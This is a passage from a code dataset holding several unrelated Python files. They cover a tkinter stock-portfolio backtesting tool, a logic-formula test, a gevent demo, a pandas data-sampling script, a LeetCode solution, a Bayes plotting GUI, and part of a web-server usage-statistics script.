text=\"Communication Services\", variable=Comm).grid(row=1, column=5)\ntk.Checkbutton(root, text=\"Healthcare\", variable=Health).grid(row=1, column=6)\n\ntk.Label(root, text=\"Country: \").grid(row=2, column=0)\ntk.Checkbutton(root, text=\"USA\", variable=usa).grid(row=3, column=1)\ntk.Checkbutton(root, text=\"Germany\", variable=ger).grid(row=3, column=2)\ntk.Checkbutton(root, text=\"China\", variable=chn).grid(row=3, column=3)\ntk.Checkbutton(root, text=\"Ireland\", variable=ire).grid(row=3, column=4)\ntk.Checkbutton(root, text=\"Netherlands\", variable=nl).grid(row=3, column=5)\ntk.Checkbutton(root, text=\"Japan\", variable=jpn).grid(row=3, column=6)\ntk.Checkbutton(root, text=\"India\", variable=india).grid(row=3, column=7)\ntk.Checkbutton(root, text=\"Israel\", variable=isr).grid(row=3, column=8)\ntk.Checkbutton(root, text=\"Canada\", variable=ca).grid(row=3, column=9)\n\ntk.Label(root, text=\"Market Cap: \").grid(row=4, column=0)\ntk.Checkbutton(root, text=\"Large Cap\", variable=lc).grid(row=5, column=1)\ntk.Checkbutton(root, text=\"Medium Cap\", variable=mc).grid(row=5, column=2)\ntk.Checkbutton(root, text=\"Small Cap\", variable=sc).grid(row=5, column=3)\n\ntk.Label(root, text=\"Time Horizon (Relative to Financial Crisis): \").grid(row=6, column=0)\ntk.Checkbutton(root, text=\"Before\", variable=before).grid(row=7, column=1)\ntk.Checkbutton(root, text=\"During\", variable=during).grid(row=7, column=2)\ntk.Checkbutton(root, text=\"After\", variable=after).grid(row=7, column=3)\n\n\ndef csvedit():\n if Tech.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Tech\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if ConCy.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Consumer Cyclical\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Ind.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Industrials\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Energy.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Energy\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Comm.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Communication Services\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Health.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Healthcare\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n\n\n\n if usa.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"USA\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ger.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"GER\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if chn.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"CHN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ire.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"IRE\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if nl.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"NL\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if jpn.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"JPN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if india.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"IN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if isr.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"ISR\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ca.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"CA\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n\n\n\n if lc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Large Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n if mc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Medium Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n if sc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Small Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n\n\n if before.get() == 1 :\n startDate.append('2000-01-01')\n endDate.append('2006-12-31')\n print(startDate)\n print(endDate)\n\n if during.get() == 1 :\n startDate.append('2007-01-01')\n endDate.append('2008-12-31')\n print(startDate)\n print(endDate)\n \n if after.get() == 1 :\n startDate.append('2009-01-01')\n endDate.append('2019-12-08')\n print(startDate)\n print(endDate)\n\n\n\ntk.Button(root, text='Quit', command=root.quit).grid(row=9, column=0)\ntk.Button(root, text='Edit', command=csvedit).grid(row=8, column=0)\n\nprint(tickersInd)\nprint(tickersCoun)\nprint(startDate)\nprint(endDate)\nroot.mainloop()\n\n\n#Optimised portfolio\n###################################################################\n\ndata = bt.get(tickersCap, start='2015-01-01')\n\nreturns = expected_returns.returns_from_prices(data)\nreturns.to_excel(\"returns.xlsx\")\n\n\n# Calculate expected returns and sample covariance\nmu = expected_returns.mean_historical_return(data)\nS = risk_models.sample_cov(data)\n\n# Optimise for maximal Sharpe ratio\nef = EfficientFrontier(mu, S)\nraw_weights = ef.max_sharpe()\ncleaned_weights = ef.clean_weights()\n\nprint(cleaned_weights)\nef.portfolio_performance(verbose=True)\n\n\nlatest_prices = get_latest_prices(data)\n\nda = DiscreteAllocation(cleaned_weights, latest_prices, total_portfolio_value=10000)\nallocation, leftover = da.lp_portfolio()\nprint(\"Discrete allocation:\", allocation)\nprint(\"Funds remaining: ${:.2f}\".format(leftover))\n\nprint(data)\n\n\n\n#SMA strategy\n##################################################\n\n\nclass SelectWhere(bt.Algo):\n\n \"\"\"\n Selects securities based on an indicator DataFrame.\n\n Selects securities where the value is True on the current date (target.now).\n\n Args:\n * signal (DataFrame): DataFrame containing the signal (boolean DataFrame)\n\n Sets:\n * selected\n\n \"\"\"\n def __init__(self, signal):\n self.signal = signal\n\n def __call__(self, target):\n # get signal on target.now\n if target.now in self.signal.index:\n sig = self.signal.ix[target.now]\n\n # get indices where true as list\n selected = list(sig.index[sig])\n\n # save in temp - this will be used by the weighing algo\n target.temp['selected'] = selected\n\n # return True because we want to keep on moving down the stack\n return True\n\n\n\n# simple backtest to test long-only allocation\ndef long_only_ew(tickers, start='2015-01-01', name='long_only_ew'):\n s = bt.Strategy(name, [bt.algos.RunOnce(),\n bt.algos.SelectAll(),\n bt.algos.WeighEqually(),\n bt.algos.Rebalance()])\n data1 = bt.get(tickers, start=start)\n return bt.Backtest(s, data1)\n\n\n# create the backtests\nbenchmark = long_only_ew('^GSPC', name='S&P500')\n\n\n#setting rfr\nriskfree = bt.get('^IRX', start='2015-01-01')\nriskfree_rate = riskfree.mean() / 100\nprint(riskfree_rate)\n\ntype(riskfree_rate)\n\nriskfree_rate = float(riskfree_rate)\ntype(riskfree_rate)\n\n\n\n#Strategy 2 - MA Cross\n################################################ \n\n\nclass WeighTarget(bt.Algo):\n \"\"\"\n Sets target weights based on a target weight DataFrame.\n\n Args:\n * target_weights (DataFrame): DataFrame containing the target weights\n\n Sets:\n * weights\n\n \"\"\"\n\n def __init__(self, target_weights):\n self.tw = target_weights\n\n def __call__(self, target):\n # get target weights on date target.now\n if target.now in self.tw.index:\n w = self.tw.ix[target.now]\n\n # save in temp - this will be used by the weighing algo\n # also dropping any na's just in case they pop up\n target.temp['weights'] = w.dropna()\n\n # return True because we want to keep on moving down the stack\n return True\n \n \n## download some data & calc SMAs\nsma50 = data.rolling(50).mean()\nsma200 = data.rolling(200).mean()\n\n\n\n## now we need to calculate our target weight DataFrame\n# first we will copy the sma200 DataFrame since our weights will have the same strucutre\ntw = sma200.copy()\n\n# set appropriate target weights\ntw[sma50 > sma200] = (1/len(data.columns))\ntw[sma50 <= sma200] = -(1/len(data.columns))\n\n# here we will set the weight to 0 - this is because the sma200 needs 200 data points before\n# calculating its first point. Therefore, it will start with a bunch of nulls (NaNs).\ntw[sma200.isnull()] = 0.0\n\n# Now set up the MA_cross strategy for our moving average cross strategy\nMA_cross = bt.Strategy('MA_cross', [bt.algos.WeighTarget(tw),\n bt.algos.Rebalance()])\n\ntest_MA = bt.Backtest(MA_cross, data)\nres_MA = bt.run(test_MA)\n\n\n# Plot security weights to test logic\n# Note we expect a picture with immediate jumps between 0.2 and -0.2 \n#res_MA.plot_security_weights()\n\n# Plot the Equity curve\n#res_MA.plot()\n\n# Show the computed results\nres_MA.set_riskfree_rate(riskfree_rate)\n\n\n#strategy - Inverse portfolio\n#####################################################\ns_inv = bt.Strategy('Inverse of Volatility', \n [bt.algos.RunMonthly(),\n bt.algos.SelectAll(),\n bt.algos.WeighInvVol(),\n bt.algos.Rebalance()])\n\nb_inv = bt.Backtest(s_inv, data)\n\n\nres_inv = bt.run(b_inv)\nres_inv.plot_security_weights()\n\n# Plot security weights to test logic\n# Note we expect a picture with immediate jumps between 0.2 and -0.2 \n#res_MA.plot_security_weights()\n\n#strategy - Random 10\n#####################################################\ns_random = bt.Strategy('Random 10', \n [bt.algos.RunMonthly(),\n bt.algos.SelectRandomly(n=10),\n bt.algos.WeighRandomly(),\n bt.algos.Rebalance()])\n\nb_random = bt.Backtest(s_random, data)\n\n# run all the backtests!\n#res2.set_riskfree_rate(riskfree_rate)\n\n#res2.plot(freq='m')\n#res2.display()\n\nresult = bt.run(test_MA, b_inv, b_random, benchmark)\nresult.set_riskfree_rate(riskfree_rate)\nresult.plot()\nresult.display()\nresults_key = result.stats.assign()\nresults_key.to_excel(\"Demonstration.xlsx\")","sub_path":"Demonstration.py","file_name":"Demonstration.py","file_ext":"py","file_size_in_byte":14340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"573391801","text":"\nNode = dict\nLeaf = str\n\n\ndef formulas(n):\n if n <= 0:\n []\n elif n == 1:\n return ['True', 'False']\n else:\n fs = formulas(n-1)\n fsN = []\n fsN += [{'Not':[f]} for f in fs]\n fsN += [{'And':[f1,f2]} for f1 in fs for f2 in fs]\n fsN += [{'Or':[f1,f2]} for f1 in fs for f2 in fs]\n return fs + fsN\n\ndef metric(f):\n if type(f) == Leaf:\n\n return 1\n if type(f) == Node:\n print(\"f: \" + str(f))\n print(\"==================\")\n for label in f:\n print(\"label: \" + str(label))\n print(\"f[label]: \" + str(f[label]))\n # print(\"metric[child]: \" + str(metric(child) for child in f[label]))\n print(\"max([metric(child) for child in f[label]]): \" + str(1) + \" =? \" + str(max([metric(child) for child in f[label]])))\n print(1+ int( max([metric(child) for child in f[label]])))\n print(\"-----------------------------------------\")\n return 1 + max([metric(child) for child in f[label]])\n\ndef formulasHelper(n):\n ret = formulas(n)\n for f in formulas(n-1):\n ret.remove(f)\n return ret\n\ndef metricTest(f):\n for x in f:\n print(metric(x))\n\nmetricTest(formulasHelper(2))\n\ndef test(i):\n for f in formulas(i):\n print(\"formulas: \" + str(metric(a)))\n\n\n if metric(a) != i:\n return False\n return True\n\n# print(test(2))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"midterm/bound_exaustive_test.py","file_name":"bound_exaustive_test.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466433587","text":"import gevent \n\ndef foo():\n print(\"Running in foo\")\n gevent.sleep(2)\n print(\"switch to foo again\")\n\ndef bar():\n print(\"Running in bar\")\n gevent.sleep(3)\n print(\"switch to bar again\")\n\n#将两个函数设置为协成,此时协成函数运行\nf = gevent.spawn(foo)\nb = gevent.spawn(bar)\n\n#回收协成\ngevent.joinall([f,b])\n","sub_path":"word/第二阶段/第二阶段小项目/day9/gevent_test.py","file_name":"gevent_test.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"507342945","text":"# encoding:utf-8\nimport pandas as pd\nimport numpy as np\nimport time\nimport datetime\n\n# sampling:\n# (1)把train.csv打乱,取4250w的数据\n# (2)把4250w的数据按时间排序,认为最后600w为\"高质量数据\"\n# (3)把最后600w打乱,再分为3部分:100w + 250w(dev set) + 250w(test set)\n# (4)故最终结果:\n# train set:3650w + 100w = 3750w\n# dev set:250w\n# test set:250w\n\n# TODO: fix the size of data\n# set_size = np.array([3750, 250, 250])\n\nstart_time = time.time()\npath = '../../data/'\n\n\ndef time_description(op):\n print(\"成功处理 %s ,累计用时 %f s\" % (op, (time.time() - start_time)))\n print()\n\n\ndef handle_operation(op):\n print(\"当前时间为:%s,正在处理%s...\" % (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), op))\n\n\noperation = \"train.csv\"\nhandle_operation(operation)\ndf = pd.read_csv(path + operation)\ntime_description(operation)\n\n# sampling\noperation = \"sample_df\"\nhandle_operation(operation)\nsample_df = df.sample(n=42500000)\ntime_description(operation)\n\n# sorted\noperation = \"sorted_df\"\nhandle_operation(operation)\nsorted_df = sample_df.sort_values(by='click_time')\ntime_description(operation)\n\n# train, dev, test - df\nlen_sample = len(sorted_df)\nhigh_quality_df = sorted_df[(len_sample - 6000000):len_sample].sample(frac=1)\nhigh_quality_train = high_quality_df[:1000000]\ndev_df = high_quality_df[len(high_quality_train):(len(high_quality_train) + 2500000)]\ntest_df = high_quality_df[(len(high_quality_train) + len(dev_df)):]\ntrain_df = sorted_df[:36500000].append(high_quality_train)\n\n# dev-output\noperation = 'dev_250w.csv'\nhandle_operation(operation)\ndev_df.to_csv(path + operation)\ntime_description(operation)\n\n# test-output\noperation = 'test_250w.csv'\nhandle_operation(operation)\ntest_df.to_csv(path + operation)\ntime_description(operation)\n\n# train-output\noperation = 'train_3750w.csv'\nhandle_operation(operation)\ntrain_df.to_csv(path + operation)\ntime_description(operation)\n\n# data_shuffled-output\noperation = 'data_shuffled_4250w.csv'\nhandle_operation(operation)\nsample_df.to_csv(path + operation)\ntime_description(operation)\n\n'''\n/home/stu/.conda/envs/deep/bin/python /home/stu/Projects/Thdlee.Snow/TalkingData/preprocess/dataset/sampling.py\n当前时间为:2018-05-01 16:45:30,正在处理train.csv...\n成功处理 train.csv ,累计用时 233.386754 s\n\n当前时间为:2018-05-01 16:49:23,正在处理sample_df...\n成功处理 sample_df ,累计用时 258.572500 s\n\n当前时间为:2018-05-01 16:49:48,正在处理sorted_df...\n成功处理 sorted_df ,累计用时 339.554489 s\n\n当前时间为:2018-05-01 16:51:14,正在处理dev_250w.csv...\n成功处理 dev_250w.csv ,累计用时 357.362650 s\n\n当前时间为:2018-05-01 16:51:27,正在处理test_250w.csv...\n成功处理 test_250w.csv ,累计用时 370.246952 s\n\n当前时间为:2018-05-01 16:51:40,正在处理train_3750w.csv...\n成功处理 train_3750w.csv ,累计用时 554.877350 s\n\n当前时间为:2018-05-01 16:54:44,正在处理data_shuffled_4250w.csv...\n成功处理 data_shuffled_4250w.csv ,累计用时 776.042315 s\n\n\nProcess finished with exit code 0\n'''\n","sub_path":"preprocess/dataset/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"615397673","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/combination-sum\n\"\"\"\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n \n results = []\n \n def dfs(cand_list, buffer):\n \n cand_sum = sum(buffer)\n \n if cand_sum == target:\n results.append(buffer)\n return\n elif cand_sum > target:\n return\n \n for idx, cand in enumerate(cand_list):\n dfs(cand_list[idx:], buffer + [cand])\n \n dfs(candidates, [])\n \n return results\n","sub_path":"archive-dhkim/leetcode/ch12_graph/prob36_combination_sum.py","file_name":"prob36_combination_sum.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"629786861","text":"from tkinter import *\nimport matplotlib\nmatplotlib.use('TkAgg')\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.pyplot as plt\n\nfrom bayes import gen_plot\n\nW_WIDTH = 900\nW_HEIGHT = 900\n\ndef print_gen_params(rho, n):\n print('rho',rho.get())\n print('n', n.get())\n\ndef main():\n root = Tk()\n root.title('Figure 1')\n root.protocol('WM_DELETE_WINDOW', lambda: root.quit()) # обработчик закрытия окна\n root.resizable(False, False)\n\n rho_label = Label(root, text='Choose the rho (gen goodness)')\n rho_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=0, to=1, tickinterval=0.1, resolution=0.1)\n rho_scale.set(0.9)\n rho_label.grid(row=0, column=0, columnspan=2)\n rho_scale.grid(row=1, column=0, columnspan=2)\n\n n_label = Label(root, text='Choose the signal length')\n n_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=0, to=100, tickinterval=10, resolution=1)\n n_scale.set(80)\n n_label.grid(row=2, column=0, columnspan=2)\n n_scale.grid(row=3, column=0, columnspan=2)\n\n delta1_label = Label(root, text='Choose the small delta')\n delta1_scale = Scale(root, orient=HORIZONTAL, length=(W_WIDTH-100)/2, from_=0, to=1, tickinterval=0.1, resolution=0.05)\n delta1_scale.set(0.9)\n delta1_label.grid(row=4, column=0, columnspan=1)\n delta1_scale.grid(row=5, column=0, columnspan=1)\n delta2_label = Label(root, text='Choose the big delta')\n delta2_scale = Scale(root, orient=HORIZONTAL, length=(W_WIDTH-100)/2, from_=0, to=1, tickinterval=0.1, resolution=0.05)\n delta2_scale.set(0.9)\n delta2_label.grid(row=4, column=1, columnspan=1)\n delta2_scale.grid(row=5, column=1, columnspan=1)\n\n count_label = Label(root, text='Choose the count of signals')\n count_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=10, to=3000, tickinterval=300, resolution=1)\n count_scale.set(3000)\n count_label.grid(row=6, column=0, columnspan=2)\n count_scale.grid(row=7, column=0, columnspan=2)\n\n res_label = Label(root, text='')\n res_label.grid(row=7, column=2)\n\n lamd = lambda:gen_plot(rho_scale.get(),n_scale.get(),fig,delta1_scale.get(),delta2_scale.get(),count_scale.get(), res_label)\n\n fig = plt.figure(1, figsize=(10,6))\n canvas = FigureCanvasTkAgg(fig, master=root)\n plot_widget = canvas.get_tk_widget()\n plot_widget.grid(row=0, column=2, rowspan=6)\n button2 = Button(root, text='Generate', command=lamd)\n button2.grid(row=6, column=2)\n\n root.bind(\"\", lambda ev: lamd())\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225341198","text":"#!/usr/bin/env python\n\"\"\"Run server statistics\"\"\"\n\nimport sys\nimport os\nimport argparse\nimport fcntl\nimport time\nfrom geoip import geolite2\nimport pycountry\nimport numpy\nimport sqlite3\n\nfrom libpredweb import myfunc\nfrom libpredweb import webserver_common as webcom\nfrom libpredweb import dataprocess\n\nprogname = os.path.basename(sys.argv[0])\nrootname_progname = os.path.splitext(progname)[0]\n\n\ndef run_statistics(g_params): # {{{\n \"\"\"Server usage analysis\"\"\"\n name_server = g_params['name_server']\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n webserver_root = g_params['webserver_root']\n run_statistics_basic(webserver_root, gen_logfile, gen_errfile)\n if name_server.lower() == \"topcons2\":\n run_statistics_topcons2(webserver_root, gen_logfile, gen_errfile)\n return 0\n# }}}\n\n\ndef run_statistics_basic(webserver_root, gen_logfile, gen_errfile): # {{{\n \"\"\"Function for qd_fe to run usage statistics for the web-server usage\n \"\"\"\n path_static = os.path.join(webserver_root, \"proj\", \"pred\", \"static\")\n path_log = os.path.join(path_static, 'log')\n path_result = os.path.join(path_static, 'result')\n path_stat = os.path.join(path_log, 'stat')\n binpath_plot = os.path.join(webserver_root, \"env\", \"bin\")\n\n # 1. calculate average running time, only for those sequences with time.txt\n # show also runtime of type and runtime -vs- seqlength\n webcom.loginfo(\"Run basic usage statistics...\\n\", gen_logfile)\n allfinishedjoblogfile = f\"{path_log}/all_finished_job.log\"\n runtimelogfile = f\"{path_log}/jobruntime.log\"\n runtimelogfile_finishedjobid = f\"{path_log}/jobruntime_finishedjobid.log\"\n allsubmitjoblogfile = f\"{path_log}/all_submitted_seq.log\"\n if not os.path.exists(path_stat):\n os.mkdir(path_stat)\n\n allfinishedjobidlist = myfunc.ReadIDList2(allfinishedjoblogfile,\n col=0, delim=\"\\t\")\n runtime_finishedjobidlist = myfunc.ReadIDList(runtimelogfile_finishedjobid)\n toana_jobidlist = list(set(allfinishedjobidlist) -\n set(runtime_finishedjobidlist))\n\n db_allfinished = f\"{path_log}/all_finished_job.sqlite3\"\n db_allsubmitted = f\"{path_log}/all_submitted_job.sqlite3\"\n sql_tablename = \"data\"\n\n for jobid in toana_jobidlist:\n runtimeloginfolist = []\n rstdir = \"%s/%s\" % (path_result, jobid)\n outpath_result = \"%s/%s\" % (rstdir, jobid)\n finished_seq_file = \"%s/finished_seqs.txt\" % (outpath_result)\n lines = []\n if os.path.exists(finished_seq_file):\n lines = myfunc.ReadFile(finished_seq_file).split(\"\\n\")\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) >= 7:\n str_seqlen = strs[1]\n str_numTM = strs[2]\n str_isHasSP = strs[3]\n source = strs[4]\n if source == \"newrun\":\n subfolder = strs[0]\n timefile = f\"{outpath_result}/{subfolder}/time.txt\"\n if (os.path.exists(timefile)\n and os.path.getsize(timefile) > 0):\n txt = myfunc.ReadFile(timefile).strip()\n try:\n ss2 = txt.split(\";\")\n runtime_str = ss2[1]\n database_mode = ss2[2]\n runtimeloginfolist.append(\"\\t\".join(\n [\n jobid, subfolder,\n source, runtime_str, database_mode,\n str_seqlen,\n str_numTM, str_isHasSP\n ]))\n except IndexError:\n sys.stderr.write(\"bad timefile %s\\n\" % (timefile))\n\n if runtimeloginfolist:\n # items for the elelment of the list\n # jobid, seq_no, newrun_or_cached, runtime,\n # mtd_profile, seqlen, numTM, iShasSP\n myfunc.WriteFile(\"\\n\".join(runtimeloginfolist)+\"\\n\",\n runtimelogfile, \"a\", True)\n myfunc.WriteFile(jobid+\"\\n\", runtimelogfile_finishedjobid, \"a\", True)\n\n# 2. get numseq_in_job vs count_of_jobs, logscale in x-axis\n# get numseq_in_job vs waiting time (time_start - time_submit)\n# get numseq_in_job vs finish time (time_finish - time_submit)\n\n allfinished_job_dict = myfunc.ReadFinishedJobLog(allfinishedjoblogfile)\n countjob_country = {} # ['country'] = [numseq, numjob, ip_set]\n outfile_numseqjob = f\"{path_stat}/numseq_of_job.stat.txt\"\n outfile_numseqjob_web = f\"{path_stat}/numseq_of_job.web.stat.txt\"\n outfile_numseqjob_wsdl = f\"{path_stat}/numseq_of_job.wsdl.stat.txt\"\n countjob_numseq_dict = {} # count the number jobs for each numseq\n countjob_numseq_dict_web = {} # numJob for each numseq submitted via web\n countjob_numseq_dict_wsdl = {} # numJob for each numseq submitted via wsdl\n\n waittime_numseq_dict = {}\n waittime_numseq_dict_web = {}\n waittime_numseq_dict_wsdl = {}\n\n finishtime_numseq_dict = {}\n finishtime_numseq_dict_web = {}\n finishtime_numseq_dict_wsdl = {}\n\n con_f = sqlite3.connect(db_allfinished)\n cur_f = con_f.cursor()\n myfunc.CreateSQLiteTableAllFinished(cur_f, tablename=sql_tablename)\n cur_f.execute('BEGIN;')\n\n webcom.loginfo(\"create all finished sql db...\\n\", gen_logfile)\n for jobid in allfinished_job_dict:\n li = allfinished_job_dict[jobid]\n numseq = -1\n try:\n numseq = int(li[4])\n except (IndexError, ValueError):\n pass\n try:\n method_submission = li[5]\n except IndexError:\n method_submission = \"\"\n\n ip = \"\"\n try:\n ip = li[2]\n except IndexError:\n pass\n\n country = \"N/A\" # this is slow\n try:\n match = geolite2.lookup(ip)\n country = pycountry.countries.get(alpha_2=match.country).name\n except Exception: # pylint: disable=broad-except\n pass\n if country != \"N/A\":\n if country not in countjob_country:\n # [numseq, numjob, ip_set]\n countjob_country[country] = [0, 0, set([])]\n if numseq != -1:\n countjob_country[country][0] += numseq\n countjob_country[country][1] += 1\n countjob_country[country][2].add(ip)\n\n submit_date_str = li[6]\n start_date_str = li[7]\n finish_date_str = li[8]\n\n # Write SQL for allfinished{{{\n row = {}\n row['jobid'] = jobid\n row['status'] = li[0]\n row['jobname'] = li[1]\n row['email'] = li[3]\n row['ip'] = ip\n row['country'] = country\n row['method_submission'] = method_submission\n row['numseq'] = numseq\n row['submit_date'] = submit_date_str\n row['start_date'] = start_date_str\n row['finish_date'] = finish_date_str\n myfunc.WriteSQLiteAllFinished(cur_f, tablename=sql_tablename,\n data=[row])\n# }}}\n\n if numseq != -1:\n if numseq not in countjob_numseq_dict:\n countjob_numseq_dict[numseq] = 0\n countjob_numseq_dict[numseq] += 1\n if method_submission == \"web\":\n if numseq not in countjob_numseq_dict_web:\n countjob_numseq_dict_web[numseq] = 0\n countjob_numseq_dict_web[numseq] += 1\n if method_submission == \"wsdl\":\n if numseq not in countjob_numseq_dict_wsdl:\n countjob_numseq_dict_wsdl[numseq] = 0\n countjob_numseq_dict_wsdl[numseq] += 1\n\n# # calculate waittime and finishtime\n is_valid_submit_date = True\n is_valid_start_date = True\n is_valid_finish_date = True\n try:\n submit_date = webcom.datetime_str_to_time(submit_date_str)\n except ValueError:\n is_valid_submit_date = False\n try:\n start_date = webcom.datetime_str_to_time(start_date_str)\n except ValueError:\n is_valid_start_date = False\n try:\n finish_date = webcom.datetime_str_to_time(finish_date_str)\n except ValueError:\n is_valid_finish_date = False\n\n if is_valid_submit_date and is_valid_start_date:\n waittime_sec = (start_date - submit_date).total_seconds()\n if numseq not in waittime_numseq_dict:\n waittime_numseq_dict[numseq] = []\n waittime_numseq_dict[numseq].append(waittime_sec)\n if method_submission == \"web\":\n if numseq not in waittime_numseq_dict_web:\n waittime_numseq_dict_web[numseq] = []\n waittime_numseq_dict_web[numseq].append(waittime_sec)\n if method_submission == \"wsdl\":\n if numseq not in waittime_numseq_dict_wsdl:\n waittime_numseq_dict_wsdl[numseq] = []\n waittime_numseq_dict_wsdl[numseq].append(waittime_sec)\n if is_valid_submit_date and is_valid_finish_date:\n finishtime_sec = (finish_date - submit_date).total_seconds()\n if numseq not in finishtime_numseq_dict:\n finishtime_numseq_dict[numseq] = []\n finishtime_numseq_dict[numseq].append(finishtime_sec)\n if method_submission == \"web\":\n if numseq not in finishtime_numseq_dict_web:\n finishtime_numseq_dict_web[numseq] = []\n finishtime_numseq_dict_web[numseq].append(finishtime_sec)\n if method_submission == \"wsdl\":\n if numseq not in finishtime_numseq_dict_wsdl:\n finishtime_numseq_dict_wsdl[numseq] = []\n finishtime_numseq_dict_wsdl[numseq].append(finishtime_sec)\n\n con_f.commit()\n con_f.close()\n\n # output countjob by country\n outfile_countjob_by_country = f\"{path_stat}/countjob_by_country.txt\"\n # sort by numseq in descending order\n li_countjob = sorted(list(countjob_country.items()),\n key=lambda x: x[1][0], reverse=True)\n li_str = []\n li_str.append(\"#Country\\tNumSeq\\tNumJob\\tNumIP\")\n for li in li_countjob:\n li_str.append(\"%s\\t%d\\t%d\\t%d\" % (li[0], li[1][0], li[1][1], len(li[1][2])))\n myfunc.WriteFile((\"\\n\".join(li_str)+\"\\n\").encode('utf-8'),\n outfile_countjob_by_country, \"wb\", True)\n\n flist = [outfile_numseqjob,\n outfile_numseqjob_web,\n outfile_numseqjob_wsdl]\n dictlist = [countjob_numseq_dict,\n countjob_numseq_dict_web,\n countjob_numseq_dict_wsdl]\n for i, outfile in enumerate(flist):\n dt = dictlist[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'count'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n count = sortedlist[j][1]\n fpout.write(\"%d\\t%d\\n\" % (nseq, count))\n fpout.close()\n # plotting\n if os.path.exists(outfile) and sortedlist:\n cmd = [f\"{binpath_plot}/plot_numseq_of_job.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n except IOError:\n continue\n cmd = [f\"{binpath_plot}/plot_numseq_of_job_mtp.sh\",\n \"-web\", outfile_numseqjob_web,\n \"-wsdl\", outfile_numseqjob_wsdl]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# 5. output num-submission time series with different bins\n# (day, week, month, year)\n con_s = sqlite3.connect(db_allsubmitted)\n cur_s = con_s.cursor()\n myfunc.CreateSQLiteTableAllSubmitted(cur_s, tablename=sql_tablename)\n cur_s.execute('BEGIN;')\n\n 